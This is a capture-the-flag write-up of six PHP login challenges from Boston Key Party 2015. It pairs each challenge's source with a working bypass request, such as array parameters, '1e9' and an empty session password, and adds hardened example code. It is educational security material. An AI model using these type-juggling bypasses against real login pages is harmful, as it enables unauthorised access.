01 March 2015

Boston Key Party CTF 2015: Web Challs Writeup


A quick look at the web challenges




LEVEL 1


<html>
<head>
     <title>level1</title>
  <link rel='stylesheet' href='style.css' type='text/css'>
</head>
<body>
<?php
require 'flag.php';
if (isset($_GET['name']) and isset($_GET['password'])) {
  if ($_GET['name'] == $_GET['password'])
    print 'Your password can not be your name.';
  else if (sha1($_GET['name']) === sha1($_GET['password']))  // no type check: sha1() of an array is not a hash
    die('Flag: '.$flag);
  else
    print '<p class="alert">Invalid password.</p>';
}
?>
<section class="login">
     <div class="title">
          <a href="./index.txt">Level 1</a>
     </div>
     <form method="get">
          <input type="text" required name="name" placeholder="Name"/><br/>
          <input type="text" required name="password" placeholder="Password" /><br/>
          <input type="submit"/>
     </form>
</section>
</body>
</html>

http://52.10.107.64:8001/?name[]=s&password[]=ss

Both parameters are sent as arrays, so $_GET['name'] and $_GET['password'] become arrays with different contents. The first check fails, since the two arrays are not loosely equal, and execution reaches sha1(). On PHP 5 and 7, sha1() handed an array only emits a warning and returns NULL, so NULL === NULL holds and the flag is printed. (PHP 8 throws a TypeError in the same place, which closes this bypass.)



LEVEL 2


<html>
<head>
     <title>level2</title>
  <link rel='stylesheet' href='style.css' type='text/css'>
</head>
<body>
<?php
require 'flag.php';
if (isset($_GET['password'])) {
     if (is_numeric($_GET['password'])){
          if (strlen($_GET['password']) < 4){
               if ($_GET['password'] > 999)  // loose comparison: a numeric string is compared as a number
                    die('Flag: '.$flag);
               else
                    print '<p class="alert">Too little</p>';
          } else
                    print '<p class="alert">Too long</p>';
     } else
          print '<p class="alert">Password is not numeric</p>';
}
?>
<section class="login">
    <div class="title">
        <a href="./index.txt">Level 2</a>
    </div>
    <form method="get">
        <input type="text" required name="password" placeholder="Password" /><br/>
        <input type="submit"/>
    </form>
</section>
</body>
</html>


We need an input of at most three characters that passes is_numeric() and still compares greater than 999.
On PHP 5, is_numeric() also accepts hex strings like 0x1, but the largest three-character hex value, 0xf, is only 15, so hex does not help.
Scientific notation does: 1e9 is three characters, is_numeric() accepts it, and the loose comparison '1e9' > 999 is done numerically, so 1000000000 > 999 holds. 5e8 works just as well.
http://52.10.107.64:8002/?password=1e9
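As an added example (not code from the challenge or from this writeup), the Level 2 check as a function beside a hardened version, run over a few constructed inputs. It assumes PHP 7 or later; on PHP 5 is_numeric() additionally accepted hex strings such as 0xf, which PHP 7 dropped.

```php
<?php
// Added example, not part of the original challenge code.
// Shows why "1e9" satisfies the Level 2 check and how to reject it.

// The original decision logic, as a function so it can be fed several inputs.
function level2_vulnerable(string $password): string
{
    if (!is_numeric($password)) {
        return 'Password is not numeric';
    }
    if (strlen($password) >= 4) {
        return 'Too long';
    }
    // A numeric string compared with an int is compared numerically,
    // so "1e9" is treated as 1000000000, not as three characters.
    return $password > 999 ? 'Flag' : 'Too little';
}

// Hardened variant: only plain decimal digits (no sign, dot, exponent or
// hex prefix), then an explicit integer cast before the range check.
function level2_hardened(string $password): string
{
    if (!ctype_digit($password)) {
        return 'Password is not numeric';
    }
    if (strlen($password) >= 4) {
        return 'Too long';
    }
    return (int) $password > 999 ? 'Flag' : 'Too little';
}

// Constructed candidates. "0xf" is numeric on PHP 5 only; it fails on PHP 7+.
foreach (['999', '1000', '1e9', '5e8', '0xf'] as $candidate) {
    printf("%-6s vulnerable: %-24s hardened: %s\n",
        var_export($candidate, true),
        level2_vulnerable($candidate),
        level2_hardened($candidate));
}
```

'1e9' and '5e8' get past the first function because a numeric string is compared with an integer numerically; the hardened version stops them at ctype_digit(), which accepts nothing but decimal digits, and '999' is still rejected by the range check.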


LEVEL 3


<html>
<head>
     <title>level3</title>
  <link rel='stylesheet' href='style.css' type='text/css'>
</head>
<body>
<?php
require 'flag.php';
if (isset($_GET['password'])) {
  if (strcmp($_GET['password'], $flag) == 0)  // strcmp() returns NULL for an array argument, and NULL == 0
          die('Flag: '.$flag);
  else
          print '<p class="alert">Invalid password.</p>';
}
?>
<section class="login">
    <div class="title">
        <a href="./index.txt">Level 3</a>
    </div>
    <form method="get">
        <input type="text" required name="password" placeholder="Password" /><br/>
        <input type="submit"/>
    </form>
</section>
</body>
</html>

This one is a plain strcmp() failure: given an array instead of a string, strcmp() emits a warning and returns NULL on PHP 5 and 7, and NULL == 0 is true under loose comparison (note the == rather than ===), so the check passes without knowing the flag.
http://52.10.107.64:8003/?password[]=


LEVEL 4


<html>
<head>
     <title>level4</title>
  <link rel='stylesheet' href='style.css' type='text/css'>
</head>
<body>
<?php
session_start();
require 'flag.php';
if (isset ($_GET['password'])) {
  if ($_GET['password'] == $_SESSION['password'])  // compared before this request's value is stored below
    die ('Flag: '.$flag);
  else
    print '<p class="alert">Wrong guess.</p>';
}
// Unpredictable seed
mt_srand((microtime() ^ rand(1, 10000)) % rand(1, 10000) + rand(1, 10000));
?>
<section class="login">
    <div class="title">
        <a href="./index.txt">Level 4</a>
    </div>
          <ul class="list">
          <?php
          for ($i=0; $i<3; $i++)
               print '<li>' . mt_rand (0, 0xffffff) . '</li>';
          $_SESSION['password'] = mt_rand (0, 0xffffff);
          ?>
          </ul>
    <form method="get">
        <input type="text" required name="password" placeholder="Next number" /><br/>
        <input type="submit"/>
    </form>
</section>
</body>
</html>

We never need to predict the seed. The guess is compared with $_SESSION['password'], but that value is only assigned further down the page, after the comparison has already run.
On a brand-new session (no cookie sent, so session_start() creates an empty one) $_SESSION['password'] does not exist yet and reads as NULL, and '' == NULL is true under loose comparison.
So send an empty password before the session has been filled in. The guess has to be empty: 'x' == NULL is false, because NULL is compared as the empty string.

$ curl http://52.10.107.64:8004/?password=
<html>
<head>
<title>level4</title>
<link href="style.css" rel="stylesheet" type="text/css"></link>
</head>
<body>
Flag: It_s33ms_that_PRNG_are_hard_too_after_all
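An added example (not the challenge's code) that models the Level 4 request flow with a plain array standing in for $_SESSION, beside a hardened version. The function names level4_request and level4_hardened are mine; it assumes PHP 7.1 or later for the nullable parameter type and random_int().

```php
<?php
// Added example, not part of the original challenge code.
// Models Level 4: the comparison runs before the session value is written,
// so the first request of a session is compared against an absent value.

// $session plays the role of $_SESSION; $password is null when no guess was sent.
function level4_request(array &$session, ?string $password): string
{
    $outcome = 'no guess';
    if ($password !== null) {
        // On a fresh session 'password' does not exist yet. The original code
        // reads $_SESSION['password'] directly and gets NULL (plus a notice).
        $expected = $session['password'] ?? null;
        $outcome = ($password == $expected) ? 'Flag' : 'Wrong guess';
    }
    // Only now is the number to guess generated, exactly as in the challenge.
    $session['password'] = mt_rand(0, 0xffffff);
    return $outcome;
}

// Hardened variant: never compare against a value that was not set, compare
// strictly as strings with hash_equals(), and draw from a CSPRNG.
function level4_hardened(array &$session, ?string $password): string
{
    $outcome = 'no guess';
    if ($password !== null) {
        $outcome = (isset($session['password'])
            && hash_equals((string) $session['password'], $password))
            ? 'Flag' : 'Wrong guess';
    }
    $session['password'] = random_int(0, 0xffffff);
    return $outcome;
}

// Each block below starts from an empty session, like a request without a cookie.
$fresh = [];
echo 'empty guess, vulnerable:     ', level4_request($fresh, ''), "\n";
$fresh = [];
echo 'non-empty guess, vulnerable: ', level4_request($fresh, 'abc'), "\n";
$fresh = [];
echo 'empty guess, hardened:       ', level4_hardened($fresh, ''), "\n";
```

Called on an empty array with an empty guess, level4_request() returns 'Flag' because '' == NULL holds; with any non-empty guess it returns 'Wrong guess', since NULL is compared as the empty string. The hardened version returns 'Wrong guess' in both cases: it requires the session value to exist before comparing, and the comparison is strict.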


LEVEL 5


<html>
<head>
     <title>level5</title>
  <link rel='stylesheet' href='style.css' type='text/css'>
</head>
<body>
<?php
require 'flag.php';
if (isset ($_GET['name']) and isset ($_GET['password'])) {
  $name = $_GET['name'];
  $password = $_GET['password'];
  if (ctype_alnum ($name) and ctype_alnum ($password)) {
    $request = 'SELECT login FROM user where login = ' . $name . ' AND password = ' . $password . ';';
    $db = new SQLite3 (sha1($flag).'.db', SQLITE3_OPEN_READONLY); // Ghetto anti-database-download
    $result = $db->querySingle ($request);  // FALSE only on an SQL error; NULL when no row matches
    $db->close ();
    if ($result === FALSE)
      echo '<p class="alert">"Invalid login or password</p>';
    else
      die('Flag: ' . $flag);
  } else
    echo '<p class="alert">Invalid chars detected</p>';
}
?>
<section class="login">
    <div class="title">
        <a href="./index.txt">Level 5</a>
    </div>
    <form method="get">
        <input type="text" required name="name" placeholder="Name"/><br/>
        <input type="text" required name="password" placeholder="Password" /><br/>
        <input type="submit"/>
    </form>
</section>
</body>
</html>



No injection is needed. Both values only have to pass ctype_alnum() and are dropped into the query unquoted, so name=1&password=1 yields SELECT login FROM user where login = 1 AND password = 1; which is valid SQL. SQLite3::querySingle() returns FALSE only when the query fails; a valid query that matches no row returns NULL, and NULL === FALSE is false, so the else branch prints the flag. Bingo!
http://52.10.107.64:8005/?name=1&password=1
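An added example (not the challenge's code) showing why Level 5 releases the flag for a query that matches nothing. It needs PHP's sqlite3 extension and uses an in-memory database with one constructed row; make_db, level5_vulnerable and level5_hardened are my names, and the table layout is assumed, since the challenge's database was never downloadable.

```php
<?php
// Added example, not part of the original challenge code. Requires the sqlite3
// extension. The in-memory table and its single row are constructed here and
// stand in for the challenge's sha1($flag).db, whose layout is unknown.

function make_db(): SQLite3
{
    $db = new SQLite3(':memory:');
    $db->exec('CREATE TABLE user (login TEXT, password TEXT)');
    $db->exec("INSERT INTO user VALUES ('admin', 'hunter2')");  // constructed sample row
    return $db;
}

// The original decision logic: only an SQL error counts as failure.
function level5_vulnerable(SQLite3 $db, string $name, string $password): string
{
    if (!ctype_alnum($name) || !ctype_alnum($password)) {
        return 'Invalid chars detected';
    }
    $request = 'SELECT login FROM user where login = ' . $name . ' AND password = ' . $password . ';';
    // querySingle() returns FALSE on error (with a warning, suppressed here),
    // NULL when the query is valid but matches no row, and the column value
    // when a row matches. Only the first of those reaches the "invalid" branch.
    $result = @$db->querySingle($request);
    return ($result === false) ? 'Invalid login or password' : 'Flag';
}

// Hardened variant: bound parameters and an explicit "no row" check.
function level5_hardened(SQLite3 $db, string $name, string $password): string
{
    $stmt = $db->prepare('SELECT login FROM user WHERE login = :login AND password = :password');
    $stmt->bindValue(':login', $name, SQLITE3_TEXT);
    $stmt->bindValue(':password', $password, SQLITE3_TEXT);
    $row = $stmt->execute()->fetchArray(SQLITE3_ASSOC);  // false when no row matches
    return ($row === false) ? 'Invalid login or password' : 'Flag';
}

$db = make_db();
$attempts = [['1', '1'], ['admin', 'hunter2'], ['admin', 'wrong'], ['1', "' OR 1"]];
foreach ($attempts as [$name, $password]) {
    printf("%-8s %-8s vulnerable: %-26s hardened: %s\n",
        $name, $password,
        level5_vulnerable($db, $name, $password),
        level5_hardened($db, $name, $password));
}
```

With 1/1 the vulnerable function builds a valid query that matches no row, so querySingle() returns NULL rather than FALSE and the flag branch is taken. With the real credentials admin/hunter2 the unquoted values are parsed by SQLite as column names, the query errors, and the vulnerable check reports an invalid login, the opposite of what it should do in both cases. The hardened version binds the values as text and tests for a missing row explicitly, so it accepts only the stored pair.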


LEVEL 6


<html>
<head>
     <title>level6</title>
  <link rel='stylesheet' href='style.css' type='text/css'>
</head>
<body>
<?php
require 'flag.php';
if (isset ($_GET['password'])) {
     if (ereg ("^[a-zA-Z0-9]+$", $_GET['password']) === FALSE)  // ereg() (removed in PHP 7) returns NULL, not FALSE, for an array argument
          echo '<p class="alert">You password must be alphanumeric</p>';
     else if (strpos ($_GET['password'], '--') !== FALSE)  // strpos() on an array also returns NULL, which is !== FALSE
          die('Flag: ' . $flag);
     else
          echo '<p class="alert">Invalid password</p>';
}
?>
<section class="login">
    <div class="title">
        <a href="./index.txt">Level 6</a>
    </div>
    <form method="get">
        <input type="text" required name="password" placeholder="Password" /><br/>
        <input type="submit"/>
    </form>
</section>
</body>
</html>

The same array trick once more. ereg() given an array emits a warning and returns NULL rather than FALSE, so the alphanumeric test is passed, and strpos() on an array also returns NULL, which satisfies !== FALSE, so the flag is printed:
http://52.10.107.64:8006/?password[]=
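Levels 1, 3 and 6 all rest on the same behaviour, so one added example (not code from the challenge or from this writeup) covers them: parse_str() shows how name[] becomes an array, level1_vulnerable() and level3_vulnerable() reproduce the two checks, and hardened() rejects non-string input before comparing. The flag value and the function names are constructed; it assumes PHP 7.1 or later. ereg() from Level 6 is left out because it was removed in PHP 7, but it fails in exactly the way strcmp() does here.

```php
<?php
// Added example, not part of the original challenge code. Demonstrates the
// array-parameter trick behind Levels 1, 3 and 6 and a hardened check.

// Level 1: sha1() on both values. On PHP 5 and 7 an internal function handed an
// array where it expects a string emits a warning and returns NULL, so the
// strict comparison NULL === NULL succeeds. On PHP 8 it throws TypeError.
function level1_vulnerable($name, $password): string
{
    try {
        if ($name == $password) {
            return 'Your password can not be your name.';
        }
        if (@sha1($name) === @sha1($password)) {
            return 'Flag';
        }
    } catch (TypeError $e) {
        return 'TypeError (PHP 8): ' . $e->getMessage();
    }
    return 'Invalid password.';
}

// Level 3: strcmp() against the flag. Same failure, but via NULL == 0.
function level3_vulnerable($password, string $flag): string
{
    try {
        if (@strcmp($password, $flag) == 0) {
            return 'Flag';
        }
    } catch (TypeError $e) {
        return 'TypeError (PHP 8): ' . $e->getMessage();
    }
    return 'Invalid password.';
}

// Hardened: refuse anything that is not a string, then compare the secret
// with hash_equals() (constant time, strict) instead of == or strcmp().
function hardened($password, string $flag): string
{
    if (!is_string($password)) {
        return 'Invalid input';
    }
    return hash_equals($flag, $password) ? 'Flag' : 'Invalid password.';
}

// parse_str() does what PHP does with a query string: name[]=s becomes an array.
parse_str('name[]=s&password[]=ss', $get);
$flag = 'constructed_flag_value';  // constructed; the real flag was never known

echo 'Level 1, arrays:       ', level1_vulnerable($get['name'], $get['password']), "\n";
echo 'Level 3, array:        ', level3_vulnerable($get['password'], $flag), "\n";
echo 'Level 3, real flag:    ', level3_vulnerable($flag, $flag), "\n";
echo 'hardened, array:       ', hardened($get['password'], $flag), "\n";
echo 'hardened, real flag:   ', hardened($flag, $flag), "\n";
```

On PHP 5 and 7 the first two calls print 'Flag' without the flag ever being supplied; on PHP 8 they report the TypeError instead, because scalar-type checking on internal functions became strict. hardened() never reaches the comparison for array input and only succeeds for the real flag.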


